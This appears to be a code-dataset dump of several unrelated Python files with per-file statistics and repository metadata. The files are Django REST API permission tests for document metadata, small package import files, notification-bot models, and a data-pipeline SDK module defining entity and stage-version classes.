document_type_metadata_type = DocumentTypeMetadataType.objects.first()
self.assertEqual(response.data['id'], document_type_metadata_type.pk)
def test_document_type_metadata_type_create_dupicate_view(self):
self._create_document_type_metadata_type()
self.grant_permission(permission=permission_document_type_edit)
response = self._request_document_type_metadata_type_create_view()
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(list(response.data.keys())[0], 'non_field_errors')
def _request_document_type_metadata_type_delete_view(self):
return self.delete(
viewname='rest_api:documenttypemetadatatype-detail',
kwargs={
'document_type_pk': self.test_document_type.pk,
'metadata_type_pk': self.test_document_type_metadata_type.pk
}
)
def test_document_type_metadata_type_delete_view_no_access(self):
self._create_document_type_metadata_type()
response = self._request_document_type_metadata_type_delete_view()
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertEqual(self.test_document_type.metadata.count(), 1)
def test_document_type_metadata_type_delete_view_with_access(self):
self._create_document_type_metadata_type()
self.grant_access(
obj=self.test_document_type,
permission=permission_document_type_edit
)
response = self._request_document_type_metadata_type_delete_view()
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
self.assertEqual(self.test_document_type.metadata.all().count(), 0)
def _request_document_type_metadata_type_list_view(self):
return self.get(
viewname='rest_api:documenttypemetadatatype-list', kwargs={
'document_type_pk': self.test_document_type.pk
}
)
def test_document_type_metadata_type_list_view_no_access(self):
self._create_document_type_metadata_type()
response = self._request_document_type_metadata_type_list_view()
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_document_type_metadata_type_list_view_with_access(self):
self._create_document_type_metadata_type()
self.grant_access(
obj=self.test_document_type,
permission=permission_document_type_view
)
response = self._request_document_type_metadata_type_list_view()
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(
response.data['results'][0]['id'],
self.test_document_type_metadata_type.pk
)
def _request_document_type_metadata_type_edit_view_via_patch(self):
return self.patch(
viewname='rest_api:documenttypemetadatatype-detail',
kwargs={
'document_type_pk': self.test_document_type.pk,
'metadata_type_pk': self.test_document_type_metadata_type.pk
}, data={
'required': True
}
)
def test_document_type_metadata_type_patch_view_no_access(self):
self._create_document_type_metadata_type()
response = self._request_document_type_metadata_type_edit_view_via_patch()
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
document_type_metadata_type = DocumentTypeMetadataType.objects.first()
self.assertFalse(document_type_metadata_type.required, True)
def test_document_type_metadata_type_patch_view_with_access(self):
self._create_document_type_metadata_type()
self.grant_access(
obj=self.test_document_type,
permission=permission_document_type_edit
)
response = self._request_document_type_metadata_type_edit_view_via_patch()
self.assertEqual(response.status_code, status.HTTP_200_OK)
document_type_metadata_type = DocumentTypeMetadataType.objects.first()
self.assertEqual(document_type_metadata_type.required, True)
def _request_document_type_metadata_type_edit_view_via_put(self):
return self.put(
viewname='rest_api:documenttypemetadatatype-detail',
kwargs={
'document_type_pk': self.test_document_type.pk,
'metadata_type_pk': self.test_document_type_metadata_type.pk
}, data={
'required': True
}
)
def test_document_type_metadata_type_put_view_no_access(self):
self._create_document_type_metadata_type()
response = self._request_document_type_metadata_type_edit_view_via_put()
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
document_type_metadata_type = DocumentTypeMetadataType.objects.first()
self.assertFalse(document_type_metadata_type.required, True)
def test_document_type_metadata_type_put_view_with_access(self):
self._create_document_type_metadata_type()
self.grant_access(
obj=self.test_document_type, permission=permission_document_type_edit
)
response = self._request_document_type_metadata_type_edit_view_via_put()
self.assertEqual(response.status_code, status.HTTP_200_OK)
document_type_metadata_type = DocumentTypeMetadataType.objects.first()
self.assertEqual(document_type_metadata_type.required, True)
class DocumentMetadataAPITestCase(
DocumentTestMixin, MetadataTypeTestMixin, BaseAPITestCase
):
def setUp(self):
super(DocumentMetadataAPITestCase, self).setUp()
self._create_test_metadata_type()
self.test_document_type.metadata.create(
metadata_type=self.test_metadata_type, required=False
)
def _create_document_metadata(self):
self.test_document_metadata = self.test_document.metadata.create(
metadata_type=self.test_metadata_type, value=TEST_METADATA_VALUE
)
def _request_document_metadata_create_view(self):
return self.post(
viewname='rest_api:documentmetadata-list',
kwargs={'document_pk': self.test_document.pk}, data={
'metadata_type_pk': self.test_metadata_type.pk,
'value': TEST_METADATA_VALUE
}
)
def test_document_metadata_create_view_no_access(self):
response = self._request_document_metadata_create_view()
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertEqual(self.test_document.metadata.count(), 0)
def test_document_metadata_create_view_with_access(self):
self.grant_access(
obj=self.test_document, permission=permission_document_metadata_add
)
response = self._request_document_metadata_create_view()
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
document_metadata = self.test_document.metadata.first()
self.assertEqual(response.data['id'], document_metadata.pk)
self.assertEqual(document_metadata.metadata_type, self.test_metadata_type)
self.assertEqual(document_metadata.value, TEST_METADATA_VALUE)
def test_document_metadata_create_duplicate_view(self):
self._create_document_metadata()
self.grant_permission(permission=permission_document_metadata_add)
response = self._request_document_metadata_create_view()
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(list(response.data.keys())[0], 'non_field_errors')
def test_document_metadata_create_invalid_lookup_value_view(self):
self.test_metadata_type.lookup = 'invalid,lookup,values,on,purpose'
self.test_metadata_type.save()
self.grant_permission(permission=permission_document_metadata_add)
response = self._request_document_metadata_create_view()
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(list(response.data.keys())[0], 'non_field_errors')
def _request_document_metadata_delete_view(self):
return self.delete(
viewname='rest_api:documentmetadata-detail',
kwargs={
'document_pk': self.test_document.pk,
'metadata_pk': self.test_document_metadata.pk
}
)
def test_document_metadata_delete_view_no_access(self):
self._create_document_metadata()
response = self._request_document_metadata_delete_view()
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertEqual(self.test_document.metadata.all().count(), 1)
def test_document_metadata_delete_view_with_access(self):
self._create_document_metadata()
self.grant_access(
obj=self.test_document,
permission=permission_document_metadata_remove
)
response = self._request_document_metadata_delete_view()
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
self.assertEqual(self.test_document.metadata.all().count(), 0)
def _request_document_metadata_list_view(self):
return self.get(
viewname='rest_api:documentmetadata-list', kwargs={
'document_pk': self.test_document.pk
}
)
def test_document_metadata_list_view_no_access(self):
self._create_document_metadata()
response = self._request_document_metadata_list_view()
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_document_metadata_list_view_with_access(self):
self._create_document_metadata()
self.grant_access(
obj=self.test_document,
permission=permission_document_metadata_view
)
response = self._request_document_metadata_list_view()
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(
response.data['results'][0]['document']['id'], self.test_document.pk
)
self.assertEqual(
response.data['results'][0]['metadata_type']['id'],
self.test_metadata_type.pk
)
self.assertEqual(
response.data['results'][0]['value'], TEST_METADATA_VALUE
)
self.assertEqual(
response.data['results'][0]['id'], self.test_document_metadata.pk
)
def _request_document_metadata_edit_view_via_patch(self):
return self.patch(
viewname='rest_api:documentmetadata-detail',
kwargs={
'document_pk': self.test_document.pk,
'metadata_pk': self.test_document_metadata.pk
}, data={
'value': TEST_METADATA_VALUE_EDITED
}
)
def test_document_metadata_patch_view_no_access(self):
self._create_document_metadata()
response = self._request_document_metadata_edit_view_via_patch()
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.test_document_metadata.refresh_from_db()
self.assertEqual(self.test_document_metadata.value, TEST_METADATA_VALUE)
def test_document_metadata_patch_view_with_access(self):
self._create_document_metadata()
self.grant_access(
obj=self.test_document,
permission=permission_document_metadata_edit
)
response = self._request_document_metadata_edit_view_via_patch()
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.test_document_metadata.refresh_from_db()
self.assertEqual(
response.data['value'], TEST_METADATA_VALUE_EDITED
)
self.assertEqual(
self.test_document_metadata.value, TEST_METADATA_VALUE_EDITED
)
def _request_document_metadata_edit_view_via_put(self):
return self.put(
viewname='rest_api:documentmetadata-detail',
kwargs={
'document_pk': self.test_document.pk,
'metadata_pk': self.test_document_metadata.pk
}, data={
'value': TEST_METADATA_VALUE_EDITED
}
)
def test_document_metadata_put_view_no_access(self):
self._create_document_metadata()
response = self._request_document_metadata_edit_view_via_put()
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.test_document_metadata.refresh_from_db()
self.assertEqual(self.test_document_metadata.value, TEST_METADATA_VALUE)
def test_document_metadata_put_view_with_access(self):
self._create_document_metadata()
self.grant_access(
obj=self.test_document,
permission=permission_document_metadata_edit
)
response = self._request_document_metadata_edit_view_via_put()
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.test_document_metadata.refresh_from_db()
self.assertEqual(
response.data['value'], TEST_METADATA_VALUE_EDITED
)
self.assertEqual(
self.test_document_metadata.value, TEST_METADATA_VALUE_EDITED
)
| 39.370175 | 88 | 0.71102 | 2,567 | 22,441 | 5.719907 | 0.043631 | 0.133215 | 0.077368 | 0.084996 | 0.904447 | 0.890077 | 0.856228 | 0.831914 | 0.807737 | 0.776817 | 0 | 0.00702 | 0.212825 | 22,441 | 569 | 89 | 39.439367 | 0.824172 | 0 | 0 | 0.575824 | 0 | 0 | 0.048215 | 0.023261 | 0 | 0 | 0 | 0 | 0.162637 | 1 | 0.118681 | false | 0 | 0.01978 | 0.032967 | 0.18022 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
ab22e87fccac5bbe3bba1f0b036a8c105554c976 | 88 | py | Python | django_weasyprint/__init__.py | Rockrdx710/django-weasyprint | 504ecbe3afb537bb9f6a8b33520c06e366aa9dae | [
"Apache-2.0"
] | 250 | 2016-08-05T11:24:11.000Z | 2022-03-30T13:36:45.000Z | django_weasyprint/__init__.py | Rockrdx710/django-weasyprint | 504ecbe3afb537bb9f6a8b33520c06e366aa9dae | [
"Apache-2.0"
] | 51 | 2016-08-05T15:26:30.000Z | 2022-03-11T10:40:27.000Z | django_weasyprint/__init__.py | Rockrdx710/django-weasyprint | 504ecbe3afb537bb9f6a8b33520c06e366aa9dae | [
"Apache-2.0"
] | 50 | 2016-08-05T12:52:26.000Z | 2021-12-09T12:36:32.000Z | from .views import WeasyTemplateResponseMixin, WeasyTemplateView, WeasyTemplateResponse
| 44 | 87 | 0.897727 | 6 | 88 | 13.166667 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.068182 | 88 | 1 | 88 | 88 | 0.963415 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
ab5bbca07b2ffa1ea9f6558a99b0bfe50c894334 | 45 | py | Python | env/lib/python2.7/site-packages/wtforms/ext/csrf/__init__.py | lindamar/ecclesi | cad07fc78daf6facd1b74cc1cb1872aaf4771fa2 | [
"MIT"
] | 481 | 2015-01-04T13:39:05.000Z | 2021-12-05T14:58:16.000Z | env/lib/python3.6/site-packages/wtforms/ext/csrf/__init__.py | amogh-gulati/corona_dashboard | ce1a20ad56bdfb758d41513b4706fe3a47764c32 | [
"MIT"
] | 309 | 2016-10-27T23:47:06.000Z | 2017-04-02T04:40:21.000Z | lib/python2.7/site-packages/wtforms/ext/csrf/__init__.py | anish03/weather-dash | d517fa9da9028d1fc5d8fd71d77cee829ddee87b | [
"MIT"
] | 127 | 2015-01-01T14:14:02.000Z | 2021-12-05T14:58:17.000Z | from wtforms.ext.csrf.form import SecureForm
| 22.5 | 44 | 0.844444 | 7 | 45 | 5.428571 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.088889 | 45 | 1 | 45 | 45 | 0.926829 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
ab5c8e440c0e3469cb870c953e8baa257e5b753f | 1,331 | py | Python | backend/notices/models.py | itimor/one-ops | f1111735de252012752dfabe11598e9690c89257 | [
"MIT"
] | null | null | null | backend/notices/models.py | itimor/one-ops | f1111735de252012752dfabe11598e9690c89257 | [
"MIT"
] | 6 | 2021-03-19T10:20:05.000Z | 2021-09-22T19:30:21.000Z | backend/notices/models.py | itimor/one-ops | f1111735de252012752dfabe11598e9690c89257 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# author: itimor
from django.db import models
from common.models import BaseModel
notice_type = {
0: 'mail',
1: 'telegram',
}
class MailBot(BaseModel):
type = models.CharField(max_length=10, choices=tuple(notice_type.items()), default=0, verbose_name='通知类型')
name = models.CharField(max_length=112, unique=True, verbose_name='名称')
host = models.CharField(max_length=112, verbose_name='主机')
user = models.CharField(max_length=112, verbose_name='账号')
password = models.CharField(max_length=112, verbose_name='密码')
to = models.CharField(max_length=112, verbose_name='接收者')
def __str__(self):
return self.name
class Meta:
verbose_name = "邮件机器人"
verbose_name_plural = verbose_name
class TelegramBot(BaseModel):
type = models.CharField(max_length=10, choices=tuple(notice_type.items()), default=1, verbose_name='通知类型')
name = models.CharField(max_length=112, unique=True, verbose_name='名称')
uid = models.CharField(max_length=112, verbose_name='账号id')
token = models.CharField(max_length=112, verbose_name='token')
chat_id = models.CharField(max_length=112, verbose_name='chat_id')
def __str__(self):
return self.name
class Meta:
verbose_name = "tg机器人"
verbose_name_plural = verbose_name
| 31.690476 | 110 | 0.701728 | 178 | 1,331 | 5.005618 | 0.320225 | 0.209877 | 0.222222 | 0.296296 | 0.7789 | 0.716049 | 0.716049 | 0.417508 | 0.417508 | 0.417508 | 0 | 0.032638 | 0.1713 | 1,331 | 41 | 111 | 32.463415 | 0.775159 | 0.027047 | 0 | 0.344828 | 0 | 0 | 0.045666 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.068966 | false | 0.034483 | 0.068966 | 0.068966 | 0.724138 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 6 |
dba9c8b932298747256b4a3e45ae13680bc774b5 | 22,711 | py | Python | flycs_sdk/entities.py | devoteamgcloud/flycs_sdk | d11a0c0057033572543e0e17704e1f401a14647e | [
"MIT"
] | null | null | null | flycs_sdk/entities.py | devoteamgcloud/flycs_sdk | d11a0c0057033572543e0e17704e1f401a14647e | [
"MIT"
] | 1 | 2022-03-01T10:16:06.000Z | 2022-03-01T12:22:16.000Z | flycs_sdk/entities.py | devoteamgcloud/flycs_sdk | d11a0c0057033572543e0e17704e1f401a14647e | [
"MIT"
] | null | null | null | """Module containing entity classes."""
from typing import Dict, List, Optional, Union
from .custom_code import CustomCode
from enum import Enum
from .transformations import Transformation
from .views import View
class ConflictingNameError(ValueError):
"""Raised when trying to insert a Transformation or View into an entities \
that already contains a Transformation or View with the same name."""
pass
class EntityKind(Enum):
"""This enumeration contains all the supported entity types."""
VANILLA = "vanilla"
DELTA_TRACKING = "delta_tracking"
DATA_VAULT = "data_vault"
class Entity:
"""Class that serves as a version configuration for a logical subset of a Pipeline."""
def __init__(
self,
name: str,
version: str,
kind: Optional[EntityKind] = None,
stage_config: Optional[Dict[str, Dict[str, str]]] = None,
custom_operators: Optional[Dict[str, List[CustomCode]]] = None,
location: Optional[str] = None,
):
"""
Create an Entity object.
:param name: the name of the entity
:param version: the version of the entity, this can be used for table naming this entity belongs to.
:param kind: the kind of the entity
:param stage_config: a dictionary with the name of the stage as key and a dictionary of query names
and their versions as value.
:param custom_operators: a dictionary with the name of the stage as key and a list
of CustomCode objects allowing to inject custom Airflow operator
into the pipeline as value
:type custom_operators: list
:param location: The location where to create the associated dataset. This field is optional and only required when you want to
manually overwrite the default dataset location configure in the environmen
"""
self.name = name
self.version = version
self.kind = kind
self.stage_config = stage_config or {}
self.transformations = {}
self.custom_operators = custom_operators or {}
self.location = location
@classmethod
def from_dict(cls, d: dict):
"""
Create an Entity object form a dictionnary created with the to_dict method.
:param d: source dictionary
:type d: dict
:return: Entity
:rtype: Entity
"""
stage_config = {stage["name"]: stage["versions"] for stage in d["stage_config"]}
return cls(
name=d["name"],
version=d["version"],
kind=EntityKind(d["kind"]) if d.get("kind") is not None else None,
stage_config=stage_config,
location=d.get("location"),
)
@property
def stages(self):
"""Return a list of all the stages defined in this entity."""
return list(self.stage_config.keys())
def get_stage_versions(self, stage: str) -> Dict[str, str]:
"""
Get the versions of the queries in the given stage.
:param stage: the stage to get the versions for
:return: the versions of the queries in the given stage
"""
return self.stage_config[stage]
def _insert_into_stage_config(self, stage: str, obj: Union[Transformation, View]):
if stage not in self.stage_config:
self.stage_config[stage] = {}
if obj.name in self.stage_config[stage]:
raise ConflictingNameError(
"an object with name {obj.name} already exists in stage {stage}"
)
self.stage_config[stage].update({obj.name: obj.version})
if stage not in self.transformations:
self.transformations[stage] = {}
if obj.name in self.transformations[stage]:
raise ConflictingNameError(
"an object with name {obj.name} already exists in stage {stage}"
)
self.transformations[stage].update({obj.name: obj})
def add_transformation(self, stage: str, transformation: Transformation):
"""Insert a Transformation into the stage_config of the entity.
:param stage: the name of the stage where to insert the transformation
:type stage: str
:param transformation: the transformation object to insert
:type transformation: Transformation
"""
self._insert_into_stage_config(stage, transformation)
def add_view(self, stage: str, view: View):
"""Insert a View into the stage_config of the entity.
:param stage: the name of the stage where to insert the transformation
:type stage: str
:param view: the View object to insert
:type view: View
"""
self._insert_into_stage_config(stage, view)
def to_dict(self) -> Dict:
"""
Serialize the entity to a dictionary object.
:return: the entity as a dictionary object.
"""
return {
"name": self.name,
"version": self.version,
"kind": self.kind.value if self.kind is not None else None,
"stage_config": [
{"name": stage, "versions": self.get_stage_versions(stage)}
for stage in self.stage_config.keys()
]
if self.stage_config is not None
else [],
"location": self.location,
}
def __eq__(self, other):
"""Implement the __eq__ method."""
return (
self.name == other.name
and self.version == other.version
and self.stage_config == other.stage_config
and self.kind == other.kind
and self.location == other.location
)
class BaseLayerEntity(Entity):
"""Class that serves as a version configuration for a logical subset of a Pipeline with fixed layers."""
_stages = ["datalake", "preamble", "staging", "data_warehouse", "data_mart"]
def __init__(
self,
name: str,
version: str,
kind: Optional[EntityKind] = None,
datalake_versions: Dict[str, str] = None,
preamble_versions: Dict[str, str] = None,
staging_versions: Dict[str, str] = None,
data_warehouse_versions: Dict[str, str] = None,
data_mart_versions: Dict[str, str] = None,
):
"""
Create an BaseLayerEntity object.
A BaseLayerEntity should be used in the case when the normal layer configuration is being used.
This means there are 5 layers: datalake, preamble, staging, data_warehouse and data_mart.
:param name: the name of the entity
:param version: the version of the entity, this can be used for table naming
this entity belongs to.
:param kind: the kind of the entity
:param datalake_versions: the versions of the queries for the datalake stage
:param preamble_versions: the versions of the queries for the preamble stage
:param staging_versions: the versions of the queries for the staging stage
:param data_warehouse_versions: the versions of the queries for the data warehouse stage
:param data_mart_versions: the versions of the queries for the data mart stage
"""
super().__init__(name, version, kind)
self.datalake_versions = datalake_versions
self.preamble_versions = preamble_versions
self.staging_versions = staging_versions
self.data_warehouse_versions = data_warehouse_versions
self.data_mart_versions = data_mart_versions
self.stage_config = self.get_stage_config()
@classmethod
def from_dict(cls, d: dict):
"""Create an BaseLayerEntity object form a dictionnary created with the to_dict method.
:param d: source dictionary
:type d: dict
:return: BaseLayerEntity
:rtype: BaseLayerEntity
"""
entity = cls(
name=d["name"],
version=d["version"],
kind=EntityKind(d["kind"]) if d.get("kind") is not None else None,
)
for stage in d.get("stage_config", {}):
if stage["name"] == "datalake":
entity.datalake_versions = stage["versions"]
elif stage["name"] == "preamble":
entity.preamble_versions = stage["versions"]
if stage["name"] == "staging":
entity.staging_versions = stage["versions"]
if stage["name"] == "data_warehouse":
entity.data_warehouse_versions = stage["versions"]
if stage["name"] == "data_mart":
entity.data_mart_versions = stage["versions"]
entity.stage_config = entity.get_stage_config()
return entity
@property
def stages(self):
"""Return a list of all the stages defined in this entity."""
return self.stages.copy()
def get_stage_config(self):
"""
Get the stage config for a base layer entity based on the fixed stages in the BaseLayerEntity.
:return: a dictionary in the form of a stage config
"""
return {stage: self.get_stage_versions(stage) for stage in self._stages}
def get_stage_versions(self, stage: str) -> Dict[str, str]:
"""
Get the versions of the queries in the given stage.
:param stage: the stage to get the versions for
:return: the versions of the queries in the given stage
"""
if stage == "datalake":
return self.get_datalake_versions()
elif stage == "preamble":
return self.get_preamble_versions()
if stage == "staging":
return self.get_staging_versions()
if stage == "data_warehouse":
return self.get_data_warehouse_versions()
if stage == "data_mart":
return self.get_data_mart_versions()
def get_datalake_versions(self) -> Dict[str, str]:
"""
Get the versions of the queries in the datalake stage.
:return: the versions of the queries in the datalake stage
"""
if self.datalake_versions is None:
return {}
else:
return self.datalake_versions
def get_preamble_versions(self) -> Dict[str, str]:
"""
Get the versions of the queries in the preamble stage.
:return: the versions of the queries in the preamble stage
"""
if self.preamble_versions is None:
return {}
else:
return self.preamble_versions
def get_staging_versions(self) -> Dict[str, str]:
"""
Get the versions of the queries in the staging stage.
:return: the versions of the queries in the staging stage
"""
if self.staging_versions is None:
return {}
else:
return self.staging_versions
def get_data_warehouse_versions(self) -> Dict[str, str]:
"""
Get the versions of the queries in the data warehouse stage.
:return: the versions of the queries in the data warehouse stage
"""
if self.data_warehouse_versions is None:
return {}
else:
return self.data_warehouse_versions
def get_data_mart_versions(self) -> Dict[str, str]:
"""
Get the versions of the queries in the data mart stage.
:return: the versions of the queries in the data mart stage
"""
if self.data_mart_versions is None:
return {}
else:
return self.data_mart_versions
class ParametrizedEntity:
"""Class that serves as a version configuration for a logical subset of a ParametrizedPipeline."""
def __init__(
self,
name: str,
version: str,
kind: Optional[EntityKind] = None,
stage_config: Optional[Dict[str, Dict[str, str]]] = None,
custom_operators: Optional[Dict[str, List[CustomCode]]] = None,
location: Optional[str] = None,
):
"""
Create a ParametrizedEntity object.
A parametrized entity should be combined with a parametrized pipeline. This allows developers to make behavior
of the entity dynamic based on the parameters from the pipeline.
:param name: the name of the entity
:param version: the version of the entity, this can be used for table naming
this entity belongs to.
:param kind: the kind of the entity
:param stage_config: a dictionary with the name of the stage as key and a dictionary of query names
and their versions as value.
:param custom_operators: a dictionary with the name of the stage as key and a list
of CustomCode objects allowing to inject custom Airflow operator
into the pipeline as value
:param location: The location where to create the associated dataset. This field is optional and only required when you want to
manually overwrite the default dataset location configure in the environmen
"""
self.name = name
self.version = version
self.kind = kind
self.stage_config = stage_config or {}
self.transformations = {}
self.custom_operators = custom_operators or {}
self.location = location
@classmethod
def from_dict(cls, d: dict):
"""Create an ParametrizedEntity object form a dictionnary created with the to_dict method.
:param d: source dictionary
:type d: dict
:return: ParametrizedEntity
:rtype: ParametrizedEntity
"""
stage_config = {stage["name"]: stage["versions"] for stage in d["stage_config"]}
return cls(
name=d["name"],
version=d["version"],
kind=EntityKind(d["kind"]) if d.get("kind") is not None else None,
stage_config=stage_config,
location=d.get("location"),
)
@property
def stages(self):
"""Return a list of all the stages defined in this entity."""
return list(self.stage_config.keys())
def get_stage_versions(
self, stage: str, parameters: Dict[str, str] = None
) -> Dict[str, str]:
"""
Get the versions of the queries in the given stage.
:param stage: the stage to get the versions for
:param parameters: the pipeline parameters
:return: the versions of the queries in the given stage
"""
return self.stage_config[stage]
def to_dict(self, parameters: Dict[str, str] = None) -> Dict:
"""
Serialize the entity to a dictionary object.
:param parameters: the pipeline parameters
:return: the entity as a dictionary object.
"""
return {
"name": _parametrized_name(self.name, parameters),
"version": self.version,
"kind": self.kind.value if self.kind is not None else None,
"stage_config": [
{"name": stage, "versions": self.get_stage_versions(stage, parameters)}
for stage in self.stage_config.keys()
],
"location": self.location,
}
def __eq__(self, other):
"""Implement the __eq__ method."""
return (
self.name == other.name
and self.version == other.version
and self.stage_config == other.stage_config
and self.kind == other.kind
and self.location == other.location
)
class ParametrizedBaseLayerEntity(ParametrizedEntity):
"""Class that serves as a version configuration for a logical subset of a ParametrizedPipeline with fixed layers."""
_stages = ["datalake", "preamble", "staging", "data_warehouse", "data_mart"]
def __init__(
self,
name: str,
version: str,
kind: Optional[EntityKind] = None,
datalake_versions: Dict[str, str] = None,
preamble_versions: Dict[str, str] = None,
staging_versions: Dict[str, str] = None,
data_warehouse_versions: Dict[str, str] = None,
data_mart_versions: Dict[str, str] = None,
):
"""
Create an BaseLayerEntity object.
A BaseLayerEntity should be used in the case when the normal layer configuration is being used.
This means there are 5 layers: datalake, preamble, staging, data_warehouse and data_mart.
:param name: the name of the entity
:param version: the version of the entity, this can be used for table naming
this entity belongs to.
:param kind: the kind of the entity
:param datalake_versions: the versions of the queries for the datalake stage
:param preamble_versions: the versions of the queries for the preamble stage
:param staging_versions: the versions of the queries for the staging stage
:param data_warehouse_versions: the versions of the queries for the data warehouse stage
:param data_mart_versions: the versions of the queries for the data mart stage
"""
super().__init__(name, version, kind)
self.datalake_versions = datalake_versions
self.preamble_versions = preamble_versions
self.staging_versions = staging_versions
self.data_warehouse_versions = data_warehouse_versions
self.data_mart_versions = data_mart_versions
self.stage_config = self.get_stage_config()
@classmethod
def from_dict(cls, d: dict):
"""Create an ParametrizedBaseLayerEntity object form a dictionnary created with the to_dict method.
:param d: source dictionary
:type d: dict
:return: ParametrizedBaseLayerEntity
:rtype: ParametrizedBaseLayerEntity
"""
entity = cls(
name=d["name"],
version=d["version"],
kind=EntityKind(d["kind"]) if d.get("kind") is not None else None,
datalake_versions=d["stage_config"],
preamble_versions=d["preamble_versions"],
staging_versions=d["staging_versions"],
data_warehouse_versions=d["data_warehouse_versions"],
data_mart_versions=d["data_mart_versions"],
)
entity.stage_config = entity.get_stage_config()
return entity
@property
def stages(self):
"""Return a list of all the stages defined in this entity."""
return self.stages.copy()
def get_stage_config(self, parameters: Dict[str, str] = None):
"""
Get the stage config for a base layer entity based on the fixed stages in the BaseLayerEntity.
:param parameters: the pipeline parameters to get the config for
:return: a dictionary in the form of a stage config
"""
return {stage: self.get_stage_versions(stage) for stage in self._stages}
def get_stage_versions(
self, stage: str, parameters: Dict[str, str] = None
) -> Dict[str, str]:
"""
Get the versions of the queries in the given stage.
:param stage: the stage to get the versions for
:param parameters: the pipeline parameters to get the versions for
:return: the versions of the queries in the given stage
"""
if stage == "datalake":
return self.get_datalake_versions(parameters)
elif stage == "preamble":
return self.get_preamble_versions(parameters)
if stage == "staging":
return self.get_staging_versions(parameters)
if stage == "data_warehouse":
return self.get_data_warehouse_versions(parameters)
if stage == "data_mart":
return self.get_data_mart_versions(parameters)
def get_datalake_versions(
self, parameters: Dict[str, str] = None
) -> Dict[str, str]:
"""
Get the versions of the queries in the datalake stage.
:param parameters: the pipeline parameters to get the versions for
:return: the versions of the queries in the datalake stage
"""
if self.datalake_versions is None:
return {}
else:
return self.datalake_versions
def get_preamble_versions(
self, parameters: Dict[str, str] = None
) -> Dict[str, str]:
"""
Get the versions of the queries in the preamble stage.
:param parameters: the pipeline parameters to get the versions for
:return: the versions of the queries in the preamble stage
"""
if self.preamble_versions is None:
return {}
else:
return self.preamble_versions
def get_staging_versions(self, parameters: Dict[str, str] = None) -> Dict[str, str]:
"""
Get the versions of the queries in the staging stage.
:param parameters: the pipeline parameters to get the versions for
:return: the versions of the queries in the staging stage
"""
if self.staging_versions is None:
return {}
else:
return self.staging_versions
def get_data_warehouse_versions(
self, parameters: Dict[str, str] = None
) -> Dict[str, str]:
"""
Get the versions of the queries in the data warehouse stage.
:param parameters: the pipeline parameters to get the versions for
:return: the versions of the queries in the data warehouse stage
"""
if self.data_warehouse_versions is None:
return {}
else:
return self.data_warehouse_versions
def get_data_mart_versions(
self, parameters: Dict[str, str] = None
) -> Dict[str, str]:
"""
Get the versions of the queries in the data mart stage.
:param parameters: the pipeline parameters to get the versions for
:return: the versions of the queries in the data mart stage
"""
if self.data_mart_versions is None:
return {}
else:
return self.data_mart_versions
def _parametrized_name(name: str, parameters: Dict[str, str]) -> str:
"""Generate a unique entity name that includes the parameters value.
:param name: original name
:type name: str
:param parameters: parameters applied to apply
:type parameters: dict
:return: parametrized parametrized name
:rtype: str
"""
if not parameters:
return name
# must follow https://cloud.google.com/bigquery/docs/datasets#dataset-naming
parts = [name, *parameters.values()]
new_name = "_".join(parts)
if len(new_name) > 1024:
raise ValueError(
f"the size of the name ({new_name}) is to big, maximum size is 1024 characters"
)
return new_name
